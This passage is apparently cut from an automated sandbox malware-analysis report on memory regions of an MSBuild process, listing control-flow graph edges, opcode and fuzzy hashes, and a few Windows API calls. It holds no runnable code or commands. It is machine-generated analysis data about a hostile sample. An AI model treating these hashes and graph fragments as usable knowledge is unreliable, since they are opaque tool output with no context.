611599d-61159a4 1926->1937 1929->1914 1930->1931 1931->1859 1931->1928 1938 6115cf8-6115cfa 1932->1938 1939 6115a18-6115bac 1932->1939 1934->1935 1943 6115798 1935->1943 1944 611579d-61157a0 1935->1944 1945 61159b6-61159b9 1936->1945 1946 61159ae-61159b3 1936->1946 1937->1936 1947 6115d01-6115d04 1938->1947 1948 6115cfc 1938->1948 1985 6115ce2-6115cf5 1939->1985 1986 6115bb2-6115bb9 1939->1986 1940->1916 1943->1944 1944->1837 1944->1853 1951 61159d3-61159d6 1945->1951 1952 61159bb-61159cc 1945->1952 1946->1945 1947->1884 1953 6115d0a-6115d13 1947->1953 1948->1947 1950->1926 1955 61159f4-61159f7 1951->1955 1956 61159d8-61159e9 1951->1956 1952->1919 1963 61159ce 1952->1963 1955->1939 1957 61159f9-61159fc 1955->1957 1956->1896 1964 61159ef 1956->1964 1957->1939 1961 61159fe-6115a01 1957->1961 1961->1919 1961->1932 1963->1951 1964->1955 1987 6115c6d-6115c74 1986->1987 1988 6115bbf-6115bf2 1986->1988 1987->1985 1990 6115c76-6115ca9 1987->1990 1999 6115bf4 1988->1999 2000 6115bf7-6115c38 1988->2000 2001 6115cab 1990->2001 2002 6115cae-6115cdb 1990->2002 1999->2000 2010 6115c50-6115c57 2000->2010 2011 6115c3a-6115c4b 2000->2011 2001->2002 2002->1953 2013 6115c5f-6115c61 2010->2013 2011->1953 2013->1953
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $
                                                                  • API String ID: 0-3993045852
                                                                  • Opcode ID: aa9f378554b3c301c93525caba0340b4c1041b4b565cf19bea2730ac1c13098e
                                                                  • Instruction ID: 866d74bb129985577e496370c9baa4329c155b7854e5d7bcfee77b8b42d8e83d
                                                                  • Opcode Fuzzy Hash: aa9f378554b3c301c93525caba0340b4c1041b4b565cf19bea2730ac1c13098e
                                                                  • Instruction Fuzzy Hash: 9122ADB1E002199FDF64DBA4C5806AEBBB2EFC9320F24847AD445AF395DB359C41CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 11d3af04b0b96c3b620178c5b88b79fb412ba262baae51e2b4259a3b23da1dd3
                                                                  • Instruction ID: aa0d599dd6f94c0fb83a9a0b2b5251a1326fd7eb4ecd9ec9546660e77fcb0e63
                                                                  • Opcode Fuzzy Hash: 11d3af04b0b96c3b620178c5b88b79fb412ba262baae51e2b4259a3b23da1dd3
                                                                  • Instruction Fuzzy Hash: B4925434A002088FDB64DB68C588B5DBBF2FB85314F5484A9E459EF365DB35ED85CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d93d502b3874eda04bf446364dc7d628681671ae87c2f730ae786e2b38dea560
                                                                  • Instruction ID: 22337244d35f7b4a0565bac08e99face8b6551f82a05d788293b9dd6081c3885
                                                                  • Opcode Fuzzy Hash: d93d502b3874eda04bf446364dc7d628681671ae87c2f730ae786e2b38dea560
                                                                  • Instruction Fuzzy Hash: 44628C34A002188FDB54DB68D554BADB7F2EB84314F248979E80ADF395DB36ED46CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 34d33eaf5276a3a8f48e2ab339bf60145d769d17fb7f83555cc0e104c82b8360
                                                                  • Instruction ID: bf03a4dcf6f5c2bfe106550ac2a440f0b3a3a676bc581708b907d2bce1365c63
                                                                  • Opcode Fuzzy Hash: 34d33eaf5276a3a8f48e2ab339bf60145d769d17fb7f83555cc0e104c82b8360
                                                                  • Instruction Fuzzy Hash: 8F224D70E142098FEF64DBA8D5907AEB7B2EB89310F24853AE409DB395DB34DC81CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3067169390.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c60000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 005719b631b437e5a4eee49302b9562e36477514e9c7709b17442ce59b20e394
                                                                  • Instruction ID: 2caf19e7581924a36622e5c601984786d4f9fdd3c723bf5b532f72fde7249f2f
                                                                  • Opcode Fuzzy Hash: 005719b631b437e5a4eee49302b9562e36477514e9c7709b17442ce59b20e394
                                                                  • Instruction Fuzzy Hash: 41B14D70E006099FDF28CFA9D8C579DBBF2AF88314F248529D825E7394EB749945CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3067169390.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c60000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7936b603b896ba58566a722c4cdd2dbba8535c76835170efdbd465caa9205403
                                                                  • Instruction ID: fd7d63c90e0032d669451d530d8a38fa685323c9ed9f93e6198bb3b68474cbc1
                                                                  • Opcode Fuzzy Hash: 7936b603b896ba58566a722c4cdd2dbba8535c76835170efdbd465caa9205403
                                                                  • Instruction Fuzzy Hash: DE917D70E00209CFDF24CFA9D9C57DEBBF2AF88314F148129E415A7294EB749986CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 611ad18-611ad36 2 611ad38-611ad3b 0->2 3 611ad3d-611ad59 2->3 4 611ad5e-611ad61 2->4 3->4 5 611ad71-611ad74 4->5 6 611ad63-611ad6c 4->6 7 611af35-611af3e 5->7 8 611ad7a-611ad7d 5->8 6->5 12 611add4-611addd 7->12 13 611af44-611af4e 7->13 10 611ad7f-611ad83 8->10 11 611ad8e-611ad91 8->11 10->13 16 611ad89 10->16 17 611ad93-611ad98 11->17 18 611ad9b-611ad9e 11->18 14 611ade3-611ade7 12->14 15 611af4f-611af61 12->15 20 611adec-611adee 14->20 28 611af63-611af6b 15->28 29 611af6c-611af86 15->29 16->11 17->18 21 611ada0-611adad 18->21 22 611adb2-611adb5 18->22 23 611adf0 20->23 24 611adf5-611adf8 20->24 21->22 25 611adb7-611adca 22->25 26 611adcf-611add2 22->26 23->24 24->2 30 611adfe-611ae22 24->30 25->26 26->12 26->20 28->29 32 611af88-611af8b 29->32 44 611af32 30->44 45 611ae28-611ae37 30->45 35 611af9a-611af9d 32->35 36 611af8d call 611b270 32->36 37 611afc0-611afc3 35->37 38 611af9f-611afbb 35->38 42 611af93-611af95 36->42 39 611afd0-611afd3 37->39 40 611afc5-611afcf 37->40 38->37 46 611afe0-611afe3 39->46 47 611afd5-611afd9 39->47 42->35 44->7 57 611ae39-611ae3f 45->57 58 611ae4f-611ae8a call 61165d8 45->58 48 611afe9-611b024 46->48 49 611b24c-611b24e 46->49 47->48 50 611afdb 47->50 59 611b217-611b22a 48->59 60 611b02a-611b036 48->60 52 611b250 49->52 53 611b255-611b258 49->53 50->46 52->53 53->32 56 611b25e-611b268 53->56 61 611ae41 57->61 62 611ae43-611ae45 57->62 76 611aea2-611aeb9 58->76 77 611ae8c-611ae92 58->77 64 611b22c 59->64 67 611b056-611b09a 60->67 68 611b038-611b051 60->68 61->58 62->58 64->49 83 611b0b6-611b0f5 67->83 84 611b09c-611b0ae 67->84 68->64 86 611aed1-611aee2 76->86 87 611aebb-611aec1 76->87 78 611ae94 77->78 79 611ae96-611ae98 77->79 78->76 79->76 93 611b0fb-611b1d6 call 61165d8 83->93 94 611b1dc-611b1f1 83->94 84->83 97 611aee4-611aeea 86->97 98 611aefa-611af2b 86->98 89 611aec3 87->89 90 611aec5-611aec7 87->90 89->86 90->86 93->94 94->59 99 611aeec 97->99 100 611aeee-611aef0 97->100 98->44 99->98 100->98
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                                  • API String ID: 0-634254105
                                                                  • Opcode ID: 695a4c9cb2417feae4ee742c0678153d51356142a9fe745e52be7a6b23dd3d27
                                                                  • Instruction ID: 40e1d7cfd6eaeff7c5aa7021fdb868051cb939780ba725e17650cf3a80216644
                                                                  • Opcode Fuzzy Hash: 695a4c9cb2417feae4ee742c0678153d51356142a9fe745e52be7a6b23dd3d27
                                                                  • Instruction Fuzzy Hash: 71E18E30E1121A8FCF55DB69D4906AEBBF2EF84311F208539E809EB255DB309946CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 255 611b6a0-611b6c2 256 611b6c4-611b6c7 255->256 257 611b6c9-611b6cd 256->257 258 611b6ee-611b6f1 256->258 259 611ba41-611ba76 257->259 260 611b6d3-611b6e3 257->260 261 611b6f3-611b6f9 258->261 262 611b70b-611b70e 258->262 273 611ba78-611ba7b 259->273 271 611b9e7-611b9e8 260->271 272 611b6e9 260->272 261->259 263 611b6ff-611b706 261->263 264 611b710-611b716 262->264 265 611b728-611b72b 262->265 263->262 264->259 268 611b71c-611b723 264->268 269 611b733-611b736 265->269 270 611b72d-611b72e 265->270 268->265 274 611b746-611b749 269->274 275 611b738-611b741 269->275 270->269 276 611b9ed-611b9f0 271->276 272->258 277 611ba7d-611ba99 273->277 278 611ba9e-611baa1 273->278 279 611b760-611b763 274->279 280 611b74b-611b74f 274->280 275->274 276->271 285 611b9f2-611b9f5 276->285 277->278 282 611baa7-611bacf 278->282 283 611bd0d-611bd0f 278->283 279->271 284 611b769-611b76c 279->284 280->259 281 611b755-611b75b 280->281 281->279 332 611bad1-611bad4 282->332 333 611bad9-611bb1d 282->333 286 611bd11 283->286 287 611bd16-611bd19 283->287 288 611b7aa-611b7ad 284->288 289 611b76e-611b783 284->289 290 611b9f7-611b9fe 285->290 291 611ba09-611ba0c 285->291 286->287 287->273 293 611bd1f-611bd28 287->293 295 611b7ba-611b7bd 288->295 296 611b7af-611b7b5 288->296 289->259 312 611b789-611b7a5 289->312 297 611b8a5-611b8ae 290->297 298 611ba04 290->298 291->271 299 611ba0e-611ba11 291->299 304 611b7e0-611b7e3 295->304 305 611b7bf-611b7db 295->305 296->295 303 611b8b3-611b8b6 297->303 298->291 300 611ba13-611ba1f 299->300 301 611ba24-611ba26 299->301 300->301 309 611ba28 301->309 310 611ba2d-611ba30 301->310 313 611b8c6-611b8c9 303->313 314 611b8b8-611b8c1 303->314 307 611b7f0-611b7f3 304->307 308 611b7e5-611b7eb 304->308 305->304 316 611b803-611b806 307->316 317 611b7f5-611b7fe 307->317 308->307 309->310 310->256 318 611ba36-611ba40 310->318 312->288 319 611b8d0-611b8d3 313->319 320 611b8cb-611b8cd 313->320 314->313 324 611b819-611b81c 316->324 325 611b808-611b80e 316->325 317->316 322 611b8d5-611b8d7 319->322 323 611b8da-611b8dd 319->323 320->319 322->323 329 611b8ff-611b902 323->329 330 611b8df-611b8fa 323->330 334 611b843-611b846 324->334 335 611b81e-611b822 324->335 325->264 331 611b814 325->331 336 611b904-611b908 329->336 337 611b929-611b92c 329->337 330->329 331->324 332->293 370 611bb23-611bb2c 333->370 371 611bd02-611bd0c 333->371 339 611b885-611b888 334->339 340 611b848-611b85d 334->340 335->259 338 611b828-611b838 335->338 336->259 344 611b90e-611b91e 336->344 337->325 346 611b932-611b935 337->346 338->257 359 611b83e 338->359 342 611b89b-611b89e 339->342 343 611b88a-611b890 339->343 340->259 353 611b863-611b880 340->353 342->343 349 611b8a0-611b8a3 342->349 343->261 348 611b896 343->348 344->335 364 611b924 344->364 351 611b947-611b94a 346->351 352 611b937 346->352 348->342 349->297 349->303 354 611b961-611b964 351->354 355 611b94c-611b950 351->355 360 611b93f-611b942 352->360 353->339 362 611b966-611b96a 354->362 363 611b97b-611b97e 354->363 355->259 361 611b956-611b95c 355->361 359->334 360->351 361->354 362->259 366 611b970-611b976 362->366 367 611b980-611b9dd call 61165d8 363->367 368 611b9e2-611b9e5 363->368 364->337 366->363 367->368 368->271 368->276 372 611bb32-611bb9e call 61165d8 370->372 373 611bcf8-611bcfd 370->373 388 611bba4-611bba9 372->388 389 611bc98-611bcad 372->389 373->371 392 611bbc5 388->392 393 611bbab-611bbb1 388->393 389->373 394 611bbc7-611bbcd 392->394 395 611bbb3-611bbb5 393->395 396 611bbb7-611bbb9 393->396 397 611bbe2-611bbef 394->397 398 611bbcf-611bbd5 394->398 399 611bbc3 395->399 396->399 406 611bbf1-611bbf7 397->406 407 611bc07-611bc14 397->407 400 611bc83-611bc92 398->400 401 611bbdb 398->401 399->394 400->388 400->389 401->397 402 611bc16-611bc23 401->402 403 611bc4a-611bc57 401->403 412 611bc25-611bc2b 402->412 413 611bc3b-611bc48 402->413 414 611bc59-611bc5f 403->414 415 611bc6f-611bc7c 403->415 409 611bbf9 406->409 410 611bbfb-611bbfd 406->410 407->400 409->407 410->407 417 611bc2d 412->417 418 611bc2f-611bc31 412->418 413->400 419 611bc61 414->419 420 611bc63-611bc65 414->420 415->400 417->413 418->413 419->415 420->415
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq
                                                                  • API String ID: 0-2331353128
                                                                  • Opcode ID: c980027232818756d4f8829bf55b90a88cf337304c4528415814b1e139269aff
                                                                  • Instruction ID: 0abf95c97bfe69c3ae0bb1100804a1442f0a57d3b479bbe2a80cdf0efe750df8
                                                                  • Opcode Fuzzy Hash: c980027232818756d4f8829bf55b90a88cf337304c4528415814b1e139269aff
                                                                  • Instruction Fuzzy Hash: 41024B70E042198FDBA4DB68D580BADB7F2EB85310F24897AE405DF295DB35ED81CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 423 60f6cf0-60f6d8f GetCurrentProcess 428 60f6d98-60f6dcc GetCurrentThread 423->428 429 60f6d91-60f6d97 423->429 430 60f6dce-60f6dd4 428->430 431 60f6dd5-60f6e09 GetCurrentProcess 428->431 429->428 430->431 433 60f6e0b-60f6e11 431->433 434 60f6e12-60f6e2d call 60f6ed0 431->434 433->434 437 60f6e33-60f6e62 GetCurrentThreadId 434->437 438 60f6e6b-60f6ecd 437->438 439 60f6e64-60f6e6a 437->439 439->438
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 060F6D7E
                                                                  • GetCurrentThread.KERNEL32 ref: 060F6DBB
                                                                  • GetCurrentProcess.KERNEL32 ref: 060F6DF8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 060F6E51
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075600086.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: de4d0863f6689d74ee50b7e9f397f02020f341b281aa672917a4939a9a7f5505
                                                                  • Instruction ID: 981fed3372905aff5994ab9074310c556eb2a5ed4cc76a224130b33abc8f0169
                                                                  • Opcode Fuzzy Hash: de4d0863f6689d74ee50b7e9f397f02020f341b281aa672917a4939a9a7f5505
                                                                  • Instruction Fuzzy Hash: 305196B0C103498FDB44DFA9D948BAEBFF1EF88314F24845EE409A72A1DB755984CB61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 446 60f6d00-60f6d8f GetCurrentProcess 450 60f6d98-60f6dcc GetCurrentThread 446->450 451 60f6d91-60f6d97 446->451 452 60f6dce-60f6dd4 450->452 453 60f6dd5-60f6e09 GetCurrentProcess 450->453 451->450 452->453 455 60f6e0b-60f6e11 453->455 456 60f6e12-60f6e2d call 60f6ed0 453->456 455->456 459 60f6e33-60f6e62 GetCurrentThreadId 456->459 460 60f6e6b-60f6ecd 459->460 461 60f6e64-60f6e6a 459->461 461->460
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 060F6D7E
                                                                  • GetCurrentThread.KERNEL32 ref: 060F6DBB
                                                                  • GetCurrentProcess.KERNEL32 ref: 060F6DF8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 060F6E51
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075600086.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: 61358698bd23f7aff6e5f56c1a332bcd57b6e6faf2c34f61e14966b4264ab198
                                                                  • Instruction ID: 4bd9ceefbba6e05cabf7ab3e3d0b109d8d4bc8688776f270ddd48f536a473adb
                                                                  • Opcode Fuzzy Hash: 61358698bd23f7aff6e5f56c1a332bcd57b6e6faf2c34f61e14966b4264ab198
                                                                  • Instruction Fuzzy Hash: CA5176B0D103098FDB44DFA9D948B9EBFF1EF88314F208459E409A72A0DB759984CF65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 468 6119190-61191b5 469 61191b7-61191ba 468->469 470 61191c0-61191d5 469->470 471 6119a78-6119a7b 469->471 477 61191d7-61191dd 470->477 478 61191ed-6119203 470->478 472 6119aa1-6119aa3 471->472 473 6119a7d-6119a9c 471->473 475 6119aa5 472->475 476 6119aaa-6119aad 472->476 473->472 475->476 476->469 480 6119ab3-6119abd 476->480 481 61191e1-61191e3 477->481 482 61191df 477->482 485 611920e-6119210 478->485 481->478 482->478 486 6119212-6119218 485->486 487 6119228-6119299 485->487 488 611921a 486->488 489 611921c-611921e 486->489 498 61192c5-61192e1 487->498 499 611929b-61192be 487->499 488->487 489->487 504 61192e3-6119306 498->504 505 611930d-6119328 498->505 499->498 504->505 510 6119353-611936e 505->510 511 611932a-611934c 505->511 516 6119370-611938c 510->516 517 6119393-61193a1 510->517 511->510 516->517 518 61193b1-611942b 517->518 519 61193a3-61193ac 517->519 525 6119478-611948d 518->525 526 611942d-611944b 518->526 519->480 525->471 530 6119467-6119476 526->530 531 611944d-611945c 526->531 530->525 530->526 531->530
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq$$dq$$dq
                                                                  • API String ID: 0-185584874
                                                                  • Opcode ID: 85a1a718b0024c25916beb907ace7a6e7df0aef15fd47e37c0dbbe398c839d6f
                                                                  • Instruction ID: c7bcf78ff0737d0ec14e927cdc32cd56b1b46e0ac8982418a1302f8b71cf6328
                                                                  • Opcode Fuzzy Hash: 85a1a718b0024c25916beb907ace7a6e7df0aef15fd47e37c0dbbe398c839d6f
                                                                  • Instruction Fuzzy Hash: 35917230F1021A9FDB55DF65D9607AEB7F6AF84304F108969D819EB348EB309D828B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 534 611cfa8-611cfc3 535 611cfc5-611cfc8 534->535 536 611d011-611d014 535->536 537 611cfca-611cfd9 535->537 538 611d023-611d026 536->538 539 611d016-611d018 536->539 540 611cfe8-611cff4 537->540 541 611cfdb-611cfe0 537->541 544 611d028-611d06a 538->544 545 611d06f-611d072 538->545 542 611d34f-611d358 539->542 543 611d01e 539->543 546 611d9c5-611d9fe 540->546 547 611cffa-611d00c 540->547 541->540 550 611d367-611d373 542->550 551 611d35a-611d35f 542->551 543->538 544->545 548 611d095-611d098 545->548 549 611d074-611d090 545->549 562 611da00-611da03 546->562 547->536 555 611d0e1-611d0e4 548->555 556 611d09a-611d0dc 548->556 549->548 552 611d484-611d489 550->552 553 611d379-611d38d 550->553 551->550 577 611d491 552->577 553->577 578 611d393-611d3a5 553->578 560 611d0e6-611d0f5 555->560 561 611d12d-611d130 555->561 556->555 563 611d104-611d110 560->563 564 611d0f7-611d0fc 560->564 571 611d132-611d174 561->571 572 611d179-611d17c 561->572 567 611da05-611da21 562->567 568 611da26-611da29 562->568 563->546 574 611d116-611d128 563->574 564->563 567->568 579 611da2b-611da57 568->579 580 611da5c-611da5f 568->580 571->572 575 611d18b-611d18e 572->575 576 611d17e-611d180 572->576 574->561 588 611d190-611d1d2 575->588 589 611d1d7-611d1da 575->589 576->577 587 611d186 576->587 582 611d494-611d4a0 577->582 600 611d3a7-611d3ad 578->600 601 611d3c9-611d3cb 578->601 579->580 585 611da61 call 611db1d 580->585 586 611da6e-611da70 580->586 582->537 597 611d4a6-611d793 582->597 605 611da67-611da69 585->605 591 611da72 586->591 592 611da77-611da7a 586->592 587->575 588->589 593 611d1e4-611d1e7 589->593 594 611d1dc-611d1e1 589->594 591->592 592->562 606 611da7c-611da8b 592->606 598 611d230-611d233 593->598 599 611d1e9-611d22b 593->599 594->593 747 611d799-611d79f 597->747 748 611d9ba-611d9c4 597->748 598->582 609 611d239-611d23c 598->609 599->598 611 611d3b1-611d3bd 600->611 612 611d3af 600->612 610 611d3d5-611d3e1 601->610 605->586 627 611daf2-611db07 606->627 628 611da8d-611daf0 call 61165d8 606->628 618 611d285-611d288 609->618 619 611d23e-611d280 609->619 636 611d3e3-611d3ed 610->636 637 611d3ef 610->637 615 611d3bf-611d3c7 611->615 612->615 615->610 623 611d2d1-611d2d4 618->623 624 611d28a-611d2cc 618->624 619->618 633 611d2d6-611d318 623->633 634 611d31d-611d320 623->634 624->623 648 611db08 627->648 628->627 633->634 644 611d322-611d338 634->644 645 611d33d-611d33f 634->645 642 611d3f4-611d3f6 636->642 637->642 642->577 651 611d3fc-611d418 call 61165d8 642->651 644->645 655 611d341 645->655 656 611d346-611d349 645->656 648->648 678 611d427-611d433 651->678 679 611d41a-611d41f 651->679 655->656 656->535 656->542 678->552 681 611d435-611d482 678->681 679->678 681->577 749 611d7a1-611d7a6 747->749 750 611d7ae-611d7b7 747->750 749->750 750->546 751 611d7bd-611d7d0 750->751 753 611d7d6-611d7dc 751->753 754 611d9aa-611d9b4 751->754 755 611d7eb-611d7f4 753->755 756 611d7de-611d7e3 753->756 754->747 754->748 755->546 757 611d7fa-611d81b 755->757 756->755 760 611d82a-611d833 757->760 761 611d81d-611d822 757->761 760->546 762 611d839-611d856 760->762 761->760 762->754 765 611d85c-611d862 762->765 765->546 766 611d868-611d881 765->766 768 611d887-611d8ae 766->768 769 611d99d-611d9a4 766->769 768->546 772 611d8b4-611d8be 768->772 769->754 769->765 772->546 773 611d8c4-611d8db 772->773 775 611d8ea-611d905 773->775 776 611d8dd-611d8e8 773->776 775->769 781 611d90b-611d924 call 61165d8 775->781 776->775 785 611d933-611d93c 781->785 786 611d926-611d92b 781->786 785->546 787 611d942-611d996 785->787 786->785 787->769
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq$$dq
                                                                  • API String ID: 0-2861643491
                                                                  • Opcode ID: 288b52f92ba5f73b3288f285d38dec38b2e5b822162b16229e9ac37b88390660
                                                                  • Instruction ID: 9a61970c4b0172f0a5c218a44792f05ae7ae90d2506996d3e833c1693cefb394
                                                                  • Opcode Fuzzy Hash: 288b52f92ba5f73b3288f285d38dec38b2e5b822162b16229e9ac37b88390660
                                                                  • Instruction Fuzzy Hash: 71627430A0061A8FCB55EF68E590A5EB7F2FF84311F209969D4099F359DB31ED86CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 795 6114bb8-6114bdc 796 6114bde-6114be1 795->796 797 6114be3-6114bfd 796->797 798 6114c02-6114c05 796->798 797->798 799 61152e4-61152e6 798->799 800 6114c0b-6114d03 798->800 802 61152e8 799->802 803 61152ed-61152f0 799->803 818 6114d86-6114d8d 800->818 819 6114d09-6114d56 call 6115460 800->819 802->803 803->796 804 61152f6-6115303 803->804 820 6114e11-6114e1a 818->820 821 6114d93-6114e03 818->821 832 6114d5c-6114d78 819->832 820->804 838 6114e05 821->838 839 6114e0e 821->839 836 6114d83 832->836 837 6114d7a 832->837 836->818 837->836 838->839 839->820
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: fiq$XPiq$\Oiq
                                                                  • API String ID: 0-1639307521
                                                                  • Opcode ID: 8cad6403af6449d00ecb9710fb29e54908fd43f33109a6ee407f3effcf59859d
                                                                  • Instruction ID: e0723782b255ba96a4c9e1e282010c450eb74e668f289a8ca1fb8f062a4327f6
                                                                  • Opcode Fuzzy Hash: 8cad6403af6449d00ecb9710fb29e54908fd43f33109a6ee407f3effcf59859d
                                                                  • Instruction Fuzzy Hash: 71617071F002189FEF54DFA5C814BAEBAF6FF88700F20852AE105AB395DB754D458B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1722 6119180-61191b5 1724 61191b7-61191ba 1722->1724 1725 61191c0-61191d5 1724->1725 1726 6119a78-6119a7b 1724->1726 1732 61191d7-61191dd 1725->1732 1733 61191ed-6119203 1725->1733 1727 6119aa1-6119aa3 1726->1727 1728 6119a7d-6119a9c 1726->1728 1730 6119aa5 1727->1730 1731 6119aaa-6119aad 1727->1731 1728->1727 1730->1731 1731->1724 1735 6119ab3-6119abd 1731->1735 1736 61191e1-61191e3 1732->1736 1737 61191df 1732->1737 1740 611920e-6119210 1733->1740 1736->1733 1737->1733 1741 6119212-6119218 1740->1741 1742 6119228-6119299 1740->1742 1743 611921a 1741->1743 1744 611921c-611921e 1741->1744 1753 61192c5-61192e1 1742->1753 1754 611929b-61192be 1742->1754 1743->1742 1744->1742 1759 61192e3-6119306 1753->1759 1760 611930d-6119328 1753->1760 1754->1753 1759->1760 1765 6119353-611936e 1760->1765 1766 611932a-611934c 1760->1766 1771 6119370-611938c 1765->1771 1772 6119393-61193a1 1765->1772 1766->1765 1771->1772 1773 61193b1-611942b 1772->1773 1774 61193a3-61193ac 1772->1774 1780 6119478-611948d 1773->1780 1781 611942d-611944b 1773->1781 1774->1735 1780->1726 1785 6119467-6119476 1781->1785 1786 611944d-611945c 1781->1786 1785->1780 1785->1781 1786->1785
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
